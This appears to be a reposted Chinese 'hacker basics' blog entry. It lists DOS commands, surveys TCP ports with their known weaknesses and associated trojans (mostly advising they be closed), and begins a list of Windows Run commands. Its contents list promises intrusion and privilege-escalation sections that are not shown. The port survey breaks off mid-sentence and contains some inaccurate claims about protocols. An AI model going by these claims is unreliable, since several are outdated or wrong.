<rt id="bn8ez"></rt>
<label id="bn8ez"></label>

  • <span id="bn8ez"></span>

    <label id="bn8ez"><meter id="bn8ez"></meter></label>

    JAVA流通橋

    JAVA啟發(fā)者

    統(tǒng)計

    留言簿(3)

    AJAX相關(guān)網(wǎng)址

    Eclipse相關(guān)網(wǎng)址

    Hibernate

    java相關(guān)網(wǎng)址

    LINUX相關(guān)網(wǎng)址

    webwork相關(guān)網(wǎng)址

    友好鏈接

    閱讀排行榜

    評論排行榜

    黑客高手必懂基礎(chǔ)內(nèi)容

    轉(zhuǎn)貼:黑客高手必懂基礎(chǔ)內(nèi)容 (發(fā)在這里只為娛樂大家)

    本帖被 nathena 執(zhí)行加亮操作(2007-06-14)
    黑客高手必懂基礎(chǔ)內(nèi)容

    第一部分:DOS命令大全
    第二部分:TCP端口:作用,漏洞,操作詳析
    第三部分:開始→運行→命令 集錦
    第四部分:IPC$空連接的入侵和防御詳解
    第五部分:GOOGLE搜索秘籍
    第六部分:21種RING的提權(quán)方法
    第七部分:菜鳥+Sa+注入工具組合=肉雞成群
    第一部分、DOS 常用命令:

    dir 列文件名     deltree 刪除目錄樹     cls 清屏       cd 改變當(dāng)前目錄
    copy 拷貝文件     diskcopy 復(fù)制磁盤       del 刪除文件     format 格式化磁盤
    edit 文本編輯     mem 查看內(nèi)存狀況       md 建立子目錄     move 移動文件、改目錄名
    more 分屏顯示     type 顯示文件內(nèi)容       rd 刪除目錄     sys 制作DOS系統(tǒng)盤
    ren 改變文件名   xcopy 拷貝目錄與文件     chkdsk 檢查磁盤   attrib 設(shè)置文件屬性
    fdisk 硬盤分區(qū)   date 顯示及修改日期     label 設(shè)置卷標(biāo)號   defrag 磁盤碎片整理
    msd 系統(tǒng)檢測     path 設(shè)置搜尋目錄       share 文件共享   memmaker內(nèi)存優(yōu)化管理
    help 幫助       restore 恢復(fù)備份文件     set 設(shè)置環(huán)境變量   time 顯示及修改時間
    tree 列目錄樹     debug 隨機調(diào)試程序     doskey 重新調(diào)用DOS命令                                                                                             prempt 設(shè)置提示符 undelete恢復(fù)被刪的文件   scandisk檢測、修理磁盤      
     
    不常用DOS命令
    diskcomp磁盤比較          append 設(shè)置非執(zhí)行文件路徑
    expand 還原DOS文件         fasthelp快速顯示幫助信息
    fc 文件比較             interink啟動服務(wù)器
    setver 設(shè)置版本           intersvr啟動客戶機
    subst 路徑替換           qbasic Basic集成環(huán)境
    vsafe 防病毒             unformat恢復(fù)已格式化的磁盤
    ver 顯示DOS版本號         smartdrv設(shè)置磁盤加速器
    vol 顯示磁盤卷標(biāo)號         lh 將程序裝入高端內(nèi)存  
    ctty 改變控制設(shè)備         emm386 擴展內(nèi)存管理
    常用命令具體介紹:  

    一、Dir

    顯示目錄文件和子目錄列表,呵呵,這個當(dāng)然是人人要知道的。
    可以使用通配符(? 和 *),?表通配一個字符,*表通配任意字符
    *.后綴
    指定要查看后綴的文件。 上面其實也可以為“ . 后綴”,例如dir *.exe 等于dir .exe
    /p
    每次顯示一個列表屏幕。要查看下一屏,請按鍵盤上的任意鍵。
    /w
    以寬格式顯示列表,在每一行上最多顯示 5 個文件名或目錄名。
    /s
    列出指定目錄及所有子目錄中出現(xiàn)的每個指定的文件名。比win環(huán)境下的查找快多了
    dir *.* -> a.txt 把當(dāng)前目錄文件列表寫入a.txt
    dir *.* /s -> a.txt 把當(dāng)前目錄文件列表寫入a.txt,包括子目錄下文件。

    二、Attrib

    顯示、設(shè)置或刪除指派給文件或目錄的只讀、存檔、系統(tǒng)以及隱藏屬性。如果在不含參數(shù)的情況下使用,則 attrib 會顯示當(dāng)前目錄中所有文件的屬性。
    +r
    設(shè)置只讀屬性。
    -r
    清除只讀屬性。
    +a
    設(shè)置存檔文件屬性。
    -a
    清除存檔文件屬性。
    +s
    設(shè)置系統(tǒng)屬性。
    -s
    清除系統(tǒng)屬性。
    +h
    設(shè)置隱藏屬性。
    -h
    清除隱藏屬性。


    三、Cls

    清除顯示在命令提示符窗口中的所有信息,并返回空窗口,即“清屏”

    四、Exit
    退出當(dāng)前命令解釋程序并返回到系統(tǒng)。

    五、format
    格式化
    /q
    執(zhí)行快速格式化。刪除以前已格式化卷的文件表和根目錄,但不在扇區(qū)之間掃描損壞區(qū)域。使用 /q 命令行選項應(yīng)該僅格式化以前已格式化的完好的卷。

    六、Ipconfig
    顯示所有當(dāng)前的 TCP/IP 網(wǎng)絡(luò)配置值、刷新動態(tài)主機配置協(xié)議 (DHCP) 和域名系統(tǒng) (DNS) 設(shè)置。使用不帶參數(shù)的 ipconfig 可以顯示所有適配器的 IP 地址、子網(wǎng)掩碼、默認(rèn)網(wǎng)關(guān)。
    /all
    顯示所有適配器的完整 TCP/IP 配置信息。
    ipconfig 等價于 winipcfg,后者在ME、98 和 95 上可用。盡管 Windows XP 沒有提供象 winipcfg 命令一樣的圖形化界面,但可以使用“網(wǎng)絡(luò)連接”查看和更新 IP 地址。要做到這一點,請打開 網(wǎng)絡(luò)連接,右鍵單擊某一網(wǎng)絡(luò)連接,單擊“狀態(tài)”,然后單擊“支持”選項卡。
    該命令最適用于配置為自動獲取 IP 地址的計算機。它使用戶可以確定哪些 TCP/IP 配置值是由 DHCP、自動專用 IP 地址 (APIPA) 和其他配置配置的。

    七、md
    創(chuàng)建目錄或子目錄

    八、Move
    將一個或多個文件從一個目錄移動到指定的目錄。

    九、Nbtstat
    顯示本地計算機和遠(yuǎn)程計算機的基于 TCP/IP (NetBT) 協(xié)議的 NetBIOS 統(tǒng)計資料、NetBIOS 名稱表和 NetBIOS 名稱緩存。Nbtstat 可以刷新 NetBIOS 名稱緩存和注冊的 Windows Internet 名稱服務(wù) (WINS) 名稱。使用不帶參數(shù)的 nbtstat 顯示幫助。Nbtstat 命令行參數(shù)區(qū)分大小寫。
    -a remotename
    顯示遠(yuǎn)程計算機的 NetBIOS 名稱表,其中,RemoteName 是遠(yuǎn)程計算機的 NetBIOS 計算機名稱。
    -A IPAddress
    顯示遠(yuǎn)程計算機的 NetBIOS 名稱表,其名稱由遠(yuǎn)程計算機的 IP 地址指定(以小數(shù)點分隔)。

    十、Netstat
    顯示活動的 TCP 連接、計算機偵聽的端口、以太網(wǎng)統(tǒng)計信息、IP 路由表、IPv4 統(tǒng)計信息(對于 IP、ICMP、TCP 和 UDP 協(xié)議)以及 IPv6 統(tǒng)計信息(對于 IPv6、ICMPv6、通過 IPv6 的 TCP 以及通過 IPv6 的 UDP 協(xié)議)。使用時如果不帶參數(shù),netstat 顯示活動的 TCP 連接。
    -a
    顯示所有活動的 TCP 連接以及計算機偵聽的 TCP 和 UDP 端口。
    十一、Ping
    通過發(fā)送“網(wǎng)際消息控制協(xié)議 (ICMP)”回響請求消息來驗證與另一臺 TCP/IP 計算機的 IP 級連接。回響應(yīng)答消息的接收情況將和往返過程的次數(shù)一起顯示出來。Ping 是用于檢測網(wǎng)絡(luò)連接性、可到達性和名稱解析的疑難問題的主要 TCP/IP 命令。如果不帶參數(shù),ping 將顯示幫助。名稱和Ip地址解析是它的最簡單應(yīng)用也是用的最多的。
    -t
    指定在中斷前 ping 可以持續(xù)發(fā)送回響請求信息到目的地。要中斷并顯示統(tǒng)計信息,請按 CTRL-BREAK。要中斷并退出 ping,請按 CTRL-C。
    -lSize
    指定發(fā)送的回響請求消息中“數(shù)據(jù)”字段的長度(以字節(jié)表示)。默認(rèn)值為 32。size 的最大值是 65,527。

    十二、Rename (Ren)
    更改文件的名稱。
    例如 ren *.abc *.cba

    十三、Set
    顯示、設(shè)置或刪除環(huán)境變量。如果沒有任何參數(shù),set 命令將顯示當(dāng)前環(huán)境設(shè)置。

    十四、Shutdown
    允許您關(guān)閉或重新啟動本地或遠(yuǎn)程計算機。如果沒有使用參數(shù),shutdown 將注銷當(dāng)前用戶。
    -m ComputerName
    指定要關(guān)閉的計算機。
    -t xx
    將用于系統(tǒng)關(guān)閉的定時器設(shè)置為 xx 秒。默認(rèn)值是 20 秒。
    -l
    注銷當(dāng)前用戶,這是默認(rèn)設(shè)置。-m ComputerName 優(yōu)先。
    -s
    關(guān)閉本地計算機。
    -r
    關(guān)閉之后重新啟動。
    -a
    中止關(guān)閉。除了 -l 和 ComputerName 外,系統(tǒng)將忽略其它參數(shù)。在超時期間,您只可以使用 -a。

    十五、System File Checker (sfc)
    win下才有,在重新啟動計算機后掃描和驗證所有受保護的系統(tǒng)文件。
    /scannow
    立即掃描所有受保護的系統(tǒng)文件。
    /scanonce
    一次掃描所有受保護的系統(tǒng)文件。
    /purgecache
    立即清除“Windows 文件保護”文件高速緩存,并掃描所有受保護的系統(tǒng)文件。
    /cachesize=x
    設(shè)置“Windows 文件保護”文件高速緩存的大小,以 MB 為單位。

    十六、type
    顯示文本文件的內(nèi)容。使用 type 命令查看文本文件或者是bat文件而不修改文件

    十七、Tree
    圖像化顯示路徑或驅(qū)動器中磁盤的目錄結(jié)構(gòu)。

    十八、Xcopy
    復(fù)制文件和目錄,包括子目錄。
    /s
    復(fù)制非空的目錄和子目錄。如果省略 /s,xcopy 將在一個目錄中工作。
    /e
    復(fù)制所有子目錄,包括空目錄。

    十九、copy
    將一個或多個文件從一個位置復(fù)制到其他位置

    二十、del
    刪除指定文件。
    ftp和bat批命令和net和telnet由于子命令太多,這里不說了,不過這幾個都是常用到的。

    第二部分、
    TCP端口:作用,漏洞,操作詳析

    在上網(wǎng)的時候,我們經(jīng)常會看到“端口”這個詞,也會經(jīng)常用到端口號,比如在FTP地址后面增加的“21”,21就表示端口號。那么端口到底是什么意思呢?怎樣查看端口號呢?一個端口是否成為網(wǎng)絡(luò)惡意攻擊的大門呢?,我們應(yīng)該如何面對形形色色的端口呢?下面就將介紹這方面的內(nèi)容,以供大家參考。
      21端口:21端口主要用于FTP(File Transfer Protocol,文件傳輸協(xié)議)服務(wù)。

      端口說明:21端口主要用于FTP(File Transfer Protocol,文件傳輸協(xié)議)服務(wù),F(xiàn)TP服務(wù)主要是為了在兩臺計算機之間實現(xiàn)文件的上傳與下載,一臺計算機作為FTP客戶端,另一臺計算機作為FTP服務(wù)器,可以采用匿名(anonymous)登錄和授權(quán)用戶名與密碼登錄兩種方式登錄FTP服務(wù)器。目前,通過FTP服務(wù)來實現(xiàn)文件的傳輸是互聯(lián)網(wǎng)上上傳、下載文件最主要的方法。另外,還有一個20端口是用于FTP數(shù)據(jù)傳輸?shù)哪J(rèn)端口號。

      在Windows中可以通過Internet信息服務(wù)(IIS)來提供FTP連接和管理,也可以單獨安裝FTP服務(wù)器軟件來實現(xiàn)FTP功能,比如常見的FTP Serv-U。

      操作建議:因為有的FTP服務(wù)器可以通過匿名登錄,所以常常會被黑客利用。另外,21端口還會被一些木馬利用,比如Blade Runner、FTP Trojan、Doly Trojan、WebEx等等。如果不架設(shè)FTP服務(wù)器,建議關(guān)閉21端口。 23端口:23端口主要用于Telnet(遠(yuǎn)程登錄)服務(wù),是Internet上普遍采用的登錄和仿真程序。

      端口說明:23端口主要用于Telnet(遠(yuǎn)程登錄)服務(wù),是Internet上普遍采用的登錄和仿真程序。同樣需要設(shè)置客戶端和服務(wù)器端,開啟Telnet服務(wù)的客戶端就可以登錄遠(yuǎn)程Telnet服務(wù)器,采用授權(quán)用戶名和密碼登錄。登錄之后,允許用戶使用命令提示符窗口進行相應(yīng)的操作。在Windows中可以在命令提示符窗口中,鍵入“Telnet”命令來使用Telnet遠(yuǎn)程登錄。

      操作建議:利用Telnet服務(wù),黑客可以搜索遠(yuǎn)程登錄Unix的服務(wù),掃描操作系統(tǒng)的類型。而且在Windows 2000中Telnet服務(wù)存在多個嚴(yán)重的漏洞,比如提升權(quán)限、拒絕服務(wù)等,可以讓遠(yuǎn)程服務(wù)器崩潰。Telnet服務(wù)的23端口也是TTS(Tiny Telnet Server)木馬的缺省端口。所以,建議關(guān)閉23端口。

      25端口:25端口為SMTP(Simple Mail Transfer Protocol,簡單郵件傳輸協(xié)議)服務(wù)器所開放,主要用于發(fā)送郵件,如今絕大多數(shù)郵件服務(wù)器都使用該協(xié)議。

      端口說明:25端口為SMTP(Simple Mail Transfer Protocol,簡單郵件傳輸協(xié)議)服務(wù)器所開放,主要用于發(fā)送郵件,如今絕大多數(shù)郵件服務(wù)器都使用該協(xié)議。比如我們在使用電子郵件客戶端程序的時候,在創(chuàng)建賬戶時會要求輸入SMTP服務(wù)器地址,該服務(wù)器地址默認(rèn)情況下使用的就是25端口。

      端口漏洞:

      1. 利用25端口,黑客可以尋找SMTP服務(wù)器,用來轉(zhuǎn)發(fā)垃圾郵件。

      2. 25端口被很多木馬程序所開放,比如Ajan、Antigen、Email Password Sender、ProMail、trojan、Tapiras、Terminator、WinPC、WinSpy等等。拿WinSpy來說,通過開放25端口,可以監(jiān)視計算機正在運行的所有窗口和模塊。

      操作建議:如果不是要架設(shè)SMTP郵件服務(wù)器,可以將該端口關(guān)閉。

    53端口:53端口為DNS(Domain Name Server,域名服務(wù)器)服務(wù)器所開放,主要用于域名解析,DNS服務(wù)在NT系統(tǒng)中使用的最為廣泛。


      端口說明:53端口為DNS(Domain Name Server,域名服務(wù)器)服務(wù)器所開放,主要用于域名解析,DNS服務(wù)在NT系統(tǒng)中使用的最為廣泛。通過DNS服務(wù)器可以實現(xiàn)域名與IP地址之間的轉(zhuǎn)換,只要記住域名就可以快速訪問網(wǎng)站。

      端口漏洞:如果開放DNS服務(wù),黑客可以通過分析DNS服務(wù)器而直接獲取Web服務(wù)器等主機的IP地址,再利用53端口突破某些不穩(wěn)定的防火墻,從而實施攻擊。近日,美國一家公司也公布了10個最易遭黑客攻擊的漏洞,其中第一位的就是DNS服務(wù)器的BIND漏洞。

      操作建議:如果當(dāng)前的計算機不是用于提供域名解析服務(wù),建議關(guān)閉該端口。

      67、68端口:67、68端口分別是為Bootp服務(wù)的Bootstrap Protocol Server(引導(dǎo)程序協(xié)議服務(wù)端)和Bootstrap Protocol Client(引導(dǎo)程序協(xié)議客戶端)開放的端口。

      端口說明:67、68端口分別是為Bootp服務(wù)的Bootstrap Protocol Server(引導(dǎo)程序協(xié)議服務(wù)端)和Bootstrap Protocol Client(引導(dǎo)程序協(xié)議客戶端)開放的端口。Bootp服務(wù)是一種產(chǎn)生于早期Unix的遠(yuǎn)程啟動協(xié)議,我們現(xiàn)在經(jīng)常用到的DHCP服務(wù)就是從Bootp服務(wù)擴展而來的。通過Bootp服務(wù)可以為局域網(wǎng)中的計算機動態(tài)分配IP地址,而不需要每個用戶去設(shè)置靜態(tài)IP地址。

      端口漏洞:如果開放Bootp服務(wù),常常會被黑客利用分配的一個IP地址作為局部路由器通過“中間人”(man-in-middle)方式進行攻擊。

      操作建議:建議關(guān)閉該端口。

      69端口:TFTP是Cisco公司開發(fā)的一個簡單文件傳輸協(xié)議,類似于FTP。

      端口說明:69端口是為TFTP(Trival File Tranfer Protocol,次要文件傳輸協(xié)議)服務(wù)開放的,TFTP是Cisco公司開發(fā)的一個簡單文件傳輸協(xié)議,類似于FTP。不過與FTP相比,TFTP不具有復(fù)雜的交互存取接口和認(rèn)證控制,該服務(wù)適用于不需要復(fù)雜交換環(huán)境的客戶端和服務(wù)器之間進行數(shù)據(jù)傳輸。

      端口漏洞:很多服務(wù)器和Bootp服務(wù)一起提供TFTP服務(wù),主要用于從系統(tǒng)下載啟動代碼。可是,因為TFTP服務(wù)可以在系統(tǒng)中寫入文件,而且黑客還可以利用TFTP的錯誤配置來從系統(tǒng)獲取任何文件。

      操作建議:建議關(guān)閉該端口。

      79端口:79端口是為Finger服務(wù)開放的,主要用于查詢遠(yuǎn)程主機在線用戶、操作系統(tǒng)類型以及是否緩沖區(qū)溢出等用戶的詳細(xì)信息。

      端口說明:79端口是為Finger服務(wù)開放的,主要用于查詢遠(yuǎn)程主機在線用戶、操作系統(tǒng)類型以及是否緩沖區(qū)溢出等用戶的詳細(xì)信息。比如要顯示遠(yuǎn)程計算機www.abc.com上的user01用戶的信息,可以在命令行中鍵入“finger user01@www.abc.com”即可。

      端口漏洞:一般黑客要攻擊對方的計算機,都是通過相應(yīng)的端口掃描工具來獲得相關(guān)信息,比如使用“流光”就可以利用79端口來掃描遠(yuǎn)程計算機操作系統(tǒng)版本,獲得用戶信息,還能探測已知的緩沖區(qū)溢出錯誤。這樣,就容易遭遇到黑客的攻擊。而且,79端口還被Firehotcker木馬作為默認(rèn)的端口。

      操作建議:建議關(guān)閉該端口。

      80端口:80端口是為HTTP(HyperText Transport Protocol,超文本傳輸協(xié)議)開放的,這是上網(wǎng)沖浪使用最多的協(xié)議,主要用于在WWW(World Wide Web,萬維網(wǎng))服務(wù)上傳輸信息的協(xié)議。

      端口說明:80端口是為HTTP(HyperText Transport Protocol,超文本傳輸協(xié)議)開放的,這是上網(wǎng)沖浪使用最多的協(xié)議,主要用于在WWW(World Wide Web,萬維網(wǎng))服務(wù)上傳輸信息的協(xié)議。我們可以通過HTTP地址加“:80”(即常說的“網(wǎng)址”)來訪問網(wǎng)站的,比如http://www.cce.com.cn:80,因為瀏覽網(wǎng)頁服務(wù)默認(rèn)的端口號是80,所以只要輸入網(wǎng)址,不用輸入“:80”。

      端口漏洞:有些木馬程序可以利用80端口來攻擊計算機的,比如Executor、RingZero等。

      操作建議:為了能正常上網(wǎng)沖浪,我們必須開啟80端口。

    99端口:99端口是用于一個名為“Metagram Relay”(亞對策延時)的服務(wù),該服務(wù)比較少見,一般是用不到的。


      端口說明:99端口是用于一個名為“Metagram Relay”(亞對策延時)的服務(wù),該服務(wù)比較少見,一般是用不到的。

      端口漏洞:雖然“Metagram Relay”服務(wù)不常用,可是Hidden Port、NCx99等木馬程序會利用該端口,比如在Windows 2000中,NCx99可以把cmd.exe程序綁定到99端口,這樣用Telnet就可以連接到服務(wù)器,隨意添加用戶、更改權(quán)限。

      操作建議:建議關(guān)閉該端口。

      109、110端口:109端口是為POP2(Post Office Protocol Version 2,郵局協(xié)議2)服務(wù)開放的,110端口是為POP3(郵件協(xié)議3)服務(wù)開放的,POP2、POP3都是主要用于接收郵件的。

      端口說明:109端口是為POP2(Post Office Protocol Version 2,郵局協(xié)議2)服務(wù)開放的,110端口是為POP3(郵件協(xié)議3)服務(wù)開放的,POP2、POP3都是主要用于接收郵件的,目前POP3使用的比較多,許多服務(wù)器都同時支持POP2和POP3。客戶端可以使用POP3協(xié)議來訪問服務(wù)端的郵件服務(wù),如今ISP的絕大多數(shù)郵件服務(wù)器都是使用該協(xié)議。在使用電子郵件客戶端程序的時候,會要求輸入POP3服務(wù)器地址,默認(rèn)情況下使用的就是110端口。

      端口漏洞:POP2、POP3在提供郵件接收服務(wù)的同時,也出現(xiàn)了不少的漏洞。單單POP3服務(wù)在用戶名和密碼交換緩沖區(qū)溢出的漏洞就不少于20個,比如WebEasyMail POP3 Server合法用戶名信息泄露漏洞,通過該漏洞遠(yuǎn)程攻擊者可以驗證用戶賬戶的存在。另外,110端口也被ProMail trojan等木馬程序所利用,通過110端口可以竊取POP賬號用戶名和密碼。

      操作建議:如果是執(zhí)行郵件服務(wù)器,可以打開該端口。

      111端口:111端口是SUN公司的RPC(Remote Procedure Call,遠(yuǎn)程過程調(diào)用)服務(wù)所開放的端口,主要用于分布式系統(tǒng)中不同計算機的內(nèi)部進程通信,RPC在多種網(wǎng)絡(luò)服務(wù)中都是很重要的組件。

      端口說明:111端口是SUN公司的RPC(Remote Procedure Call,遠(yuǎn)程過程調(diào)用)服務(wù)所開放的端口,主要用于分布式系統(tǒng)中不同計算機的內(nèi)部進程通信,RPC在多種網(wǎng)絡(luò)服務(wù)中都是很重要的組件。常見的RPC服務(wù)有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等等。在Microsoft的Windows中,同樣也有RPC服務(wù)。

      端口漏洞:SUN RPC有一個比較大漏洞,就是在多個RPC服務(wù)時xdr_array函數(shù)存在遠(yuǎn)程緩沖溢出漏洞,通過該漏洞允許攻擊者傳遞超

      113端口:113端口主要用于Windows的“Authentication Service”(驗證服務(wù))。

      端口說明:113端口主要用于Windows的“Authentication Service”(驗證服務(wù)),一般與網(wǎng)絡(luò)連接的計算機都運行該服務(wù),主要用于驗證TCP連接的用戶,通過該服務(wù)可以獲得連接計算機的信息。在Windows 2000/2003 Server中,還有專門的IAS組件,通過該組件可以方便遠(yuǎn)程訪問中進行身份驗證以及策略管理。

      端口漏洞:113端口雖然可以方便身份驗證,但是也常常被作為FTP、POP、SMTP、IMAP以及IRC等網(wǎng)絡(luò)服務(wù)的記錄器,這樣會被相應(yīng)的木馬程序所利用,比如基于IRC聊天室控制的木馬。另外,113端口還是Invisible Identd Deamon、Kazimas等木馬默認(rèn)開放的端口。

      操作建議:建議關(guān)閉該端口。

      119端口:119端口是為“Network News Transfer Protocol”(網(wǎng)絡(luò)新聞組傳輸協(xié)議,簡稱NNTP)開放的。

      端口說明:119端口是為“Network News Transfer Protocol”(網(wǎng)絡(luò)新聞組傳輸協(xié)議,簡稱NNTP)開放的,主要用于新聞組的傳輸,當(dāng)查找USENET服務(wù)器的時候會使用該端口。

      端口漏洞:著名的Happy99蠕蟲病毒默認(rèn)開放的就是119端口,如果中了該病毒會不斷發(fā)送電子郵件進行傳播,并造成網(wǎng)絡(luò)的堵塞。

      操作建議:如果是經(jīng)常使用USENET新聞組,就要注意不定期關(guān)閉該端口。 135端口:135端口主要用于使用RPC(Remote Procedure Call,遠(yuǎn)程過程調(diào)用)協(xié)議并提供DCOM(分布式組件對象模型)服務(wù)。


      端口說明:135端口主要用于使用RPC(Remote Procedure Call,遠(yuǎn)程過程調(diào)用)協(xié)議并提供DCOM(分布式組件對象模型)服務(wù),通過RPC可以保證在一臺計算機上運行的程序可以順利地執(zhí)行遠(yuǎn)程計算機上的代碼;使用DCOM可以通過網(wǎng)絡(luò)直接進行通信,能夠跨包括HTTP協(xié)議在內(nèi)的多種網(wǎng)絡(luò)傳輸。

      端口漏洞:相信去年很多Windows 2000和Windows XP用戶都中了“沖擊波”病毒,該病毒就是利用RPC漏洞來攻擊計算機的。RPC本身在處理通過TCP/IP的消息交換部分有一個漏洞,該漏洞是由于錯誤地處理格式不正確的消息造成的。該漏洞會影響到RPC與DCOM之間的一個接口,該接口偵聽的端口就是135。

      操作建議:為了避免“沖擊波”病毒的攻擊,建議關(guān)閉該端口。

      137端口:137端口主要用于“NetBIOS Name Service”(NetBIOS名稱服務(wù))。

      端口說明:137端口主要用于“NetBIOS Name Service”(NetBIOS名稱服務(wù)),屬于UDP端口,使用者只需要向局域網(wǎng)或互聯(lián)網(wǎng)上的某臺計算機的137端口發(fā)送一個請求,就可以獲取該計算機的名稱、注冊用戶名,以及是否安裝主域控制器、IIS是否正在運行等信息。

      端口漏洞:因為是UDP端口,對于攻擊者來說,通過發(fā)送請求很容易就獲取目標(biāo)計算機的相關(guān)信息,有些信息是直接可以被利用,并分析漏洞的,比如IIS服務(wù)。另外,通過捕獲正在利用137端口進行通信的信息包,還可能得到目標(biāo)計算機的啟動和關(guān)閉的時間,這樣就可以利用專門的工具來攻擊。

      操作建議:建議關(guān)閉該端口。

      139端口:139端口是為“NetBIOS Session Service”提供的,主要用于提供Windows文件和打印機共享以及Unix中的Samba服務(wù)。

      端口說明:139端口是為“NetBIOS Session Service”提供的,主要用于提供Windows文件和打印機共享以及Unix中的Samba服務(wù)。在Windows中要在局域網(wǎng)中進行文件的共享,必須使用該服務(wù)。比如在Windows 98中,可以打開“控制面板”,雙擊“網(wǎng)絡(luò)”圖標(biāo),在“配置”選項卡中單擊“文件及打印共享”按鈕選中相應(yīng)的設(shè)置就可以安裝啟用該服務(wù);在Windows 2000/XP中,可以打開“控制面板”,雙擊“網(wǎng)絡(luò)連接”圖標(biāo),打開本地連接屬性;接著,在屬性窗口的“常規(guī)”選項卡中選擇“Internet協(xié)議(TCP/IP)”,單擊“屬性”按鈕;然后在打開的窗口中,單擊“高級”按鈕;在“高級TCP/IP設(shè)置”窗口中選擇“WINS”選項卡,在“NetBIOS設(shè)置”區(qū)域中啟用TCP/IP上的NetBIOS。

      端口漏洞:開啟139端口雖然可以提供共享服務(wù),但是常常被攻擊者所利用進行攻擊,比如使用流光、SuperScan等端口掃描工具,可以掃描目標(biāo)計算機的139端口,如果發(fā)現(xiàn)有漏洞,可以試圖獲取用戶名和密碼,這是非常危險的。

      操作建議:如果不需要提供文件和打印機共享,建議關(guān)閉該端口。

      143端口:143端口主要是用于“Internet Message Access Protocol”v2(Internet消息訪問協(xié)議,簡稱IMAP)。

      端口說明:143端口主要是用于“Internet Message Access Protocol”v2(Internet消息訪問協(xié)議,簡稱IMAP),和POP3一樣,是用于電子郵件的接收的協(xié)議。通過IMAP協(xié)議我們可以在不接收郵件的情況下,知道信件的內(nèi)容,方便管理服務(wù)器中的電子郵件。不過,相對于POP3協(xié)議要負(fù)責(zé)一些。如今,大部分主流的電子郵件客戶端軟件都支持該協(xié)議。

      端口漏洞:同POP3協(xié)議的110端口一樣,IMAP使用的143端口也存在緩沖區(qū)溢出漏洞,通過該漏洞可以獲取用戶名和密碼。另外,還有一種名為“admv0rm”的Linux蠕蟲病毒會利用該端口進行繁殖。

      操作建議:如果不是使用IMAP服務(wù)器操作,應(yīng)該將該端口關(guān)閉。

      161端口:161端口是用于“Simple Network Management Protocol”(簡單網(wǎng)絡(luò)管理協(xié)議,簡稱SNMP)。

      端口說明:161端口是用于“Simple Network Management Protocol”(簡單網(wǎng)絡(luò)管理協(xié)議,簡稱SNMP),該協(xié)議主要用于管理TCP/IP網(wǎng)絡(luò)中的網(wǎng)絡(luò)協(xié)議,在Windows中通過SNMP服務(wù)可以提供關(guān)于TCP/IP網(wǎng)絡(luò)上主機以及各種網(wǎng)絡(luò)設(shè)備的狀態(tài)信息。目前,幾乎所有的網(wǎng)絡(luò)設(shè)備廠商都實現(xiàn)對SNMP的支持。

      在Windows 2000/XP中要安裝SNMP服務(wù),我們首先可以打開“Windows組件向?qū)?#8221;,在“組件”中選擇“管理和監(jiān)視工具”,單擊“詳細(xì)信息”按鈕就可以看到“簡單網(wǎng)絡(luò)管理協(xié)議(SNMP)”,選中該組件;然后,單擊“下一步”就可以進行安裝。

      端口漏洞:因為通過SNMP可以獲得網(wǎng)絡(luò)中各種設(shè)備的狀態(tài)信息,還能用于對網(wǎng)絡(luò)設(shè)備的控制,所以黑客可以通過SNMP漏洞來完全控制網(wǎng)絡(luò)。

      操作建議:建議關(guān)閉該端口443端口:443端口即網(wǎng)頁瀏覽端口,主要是用于HTTPS服務(wù),是提供加密和通過安全端口傳輸?shù)牧硪环NHTTP。


      端口說明:443端口即網(wǎng)頁瀏覽端口,主要是用于HTTPS服務(wù),是提供加密和通過安全端口傳輸?shù)牧硪环NHTTP。在一些對安全性要求較高的網(wǎng)站,比如銀行、證券、購物等,都采用HTTPS服務(wù),這樣在這些網(wǎng)站上的交換信息其他人都無法看到,保證了交易的安全性。網(wǎng)頁的地址以https://開始,而不是常見的http://。

      端口漏洞:HTTPS服務(wù)一般是通過SSL(安全套接字層)來保證安全性的,但是SSL漏洞可能會受到黑客的攻擊,比如可以黑掉在線銀行系統(tǒng),盜取信用卡賬號等。

      操作建議:建議開啟該端口,用于安全性網(wǎng)頁的訪問。另外,為了防止黑客的攻擊,應(yīng)該及時安裝微軟針對SSL漏洞發(fā)布的最新安全補丁。

      554端口:554端口默認(rèn)情況下用于“Real Time Streaming Protocol”(實時流協(xié)議,簡稱RTSP)。

      端口說明:554端口默認(rèn)情況下用于“Real Time Streaming Protocol”(實時流協(xié)議,簡稱RTSP),該協(xié)議是由RealNetworks和Netscape共同提出的,通過RTSP協(xié)議可以借助于Internet將流媒體文件傳送到RealPlayer中播放,并能有效地、最大限度地利用有限的網(wǎng)絡(luò)帶寬,傳輸?shù)牧髅襟w文件一般是Real服務(wù)器發(fā)布的,包括有.rm、.ram。如今,很多的下載軟件都支持RTSP協(xié)議,比如FlashGet、影音傳送帶等等。

      端口漏洞:目前,RTSP協(xié)議所發(fā)現(xiàn)的漏洞主要就是RealNetworks早期發(fā)布的Helix Universal Server存在緩沖區(qū)溢出漏洞,相對來說,使用的554端口是安全的。

      操作建議:為了能欣賞并下載到RTSP協(xié)議的流媒體文件,建議開啟554端口。

      1024端口:1024端口一般不固定分配給某個服務(wù),在英文中的解釋是“Reserved”(保留)。

      端口說明:1024端口一般不固定分配給某個服務(wù),在英文中的解釋是“Reserved”(保留)。之前,我們曾經(jīng)提到過動態(tài)端口的范圍是從1024~65535,而1024正是動態(tài)端口的開始。該端口一般分配給第一個向系統(tǒng)發(fā)出申請的服務(wù),在關(guān)閉服務(wù)的時候,就會釋放1024端口,等待其他服務(wù)的調(diào)用。

      端口漏洞:著名的YAI木馬病毒默認(rèn)使用的就是1024端口,通過該木馬可以遠(yuǎn)程控制目標(biāo)計算機,獲取計算機的屏幕圖像、記錄鍵盤事件、獲取密碼等,后果是比較嚴(yán)重的。

      操作建議:一般的殺毒軟件都可以方便地進行YAI病毒的查殺,所以在確認(rèn)無YAI病毒的情況下建議開啟該端口。

    第三部分、
    開始→運行→命令 集錦
    winver---------檢查Windows版本
    wmimgmt.msc----打開windows管理體系結(jié)構(gòu)(WMI)
    wupdmgr--------windows更新程序
    wscript--------windows腳本宿主設(shè)置
    write----------寫字板
    winmsd---------系統(tǒng)信息
    wiaacmgr-------掃描儀和照相機向?qū)?
    winchat--------XP自帶局域網(wǎng)聊天

    mem.exe--------顯示內(nèi)存使用情況
    Msconfig.exe---系統(tǒng)配置實用程序
    mplayer2-------簡易widnows media player
    mspaint--------畫圖板
    mstsc----------遠(yuǎn)程桌面連接
    mplayer2-------媒體播放機
    magnify--------放大鏡實用程序
    mmc------------打開控制臺
    mobsync--------同步命令

    dxdiag---------檢查DirectX信息
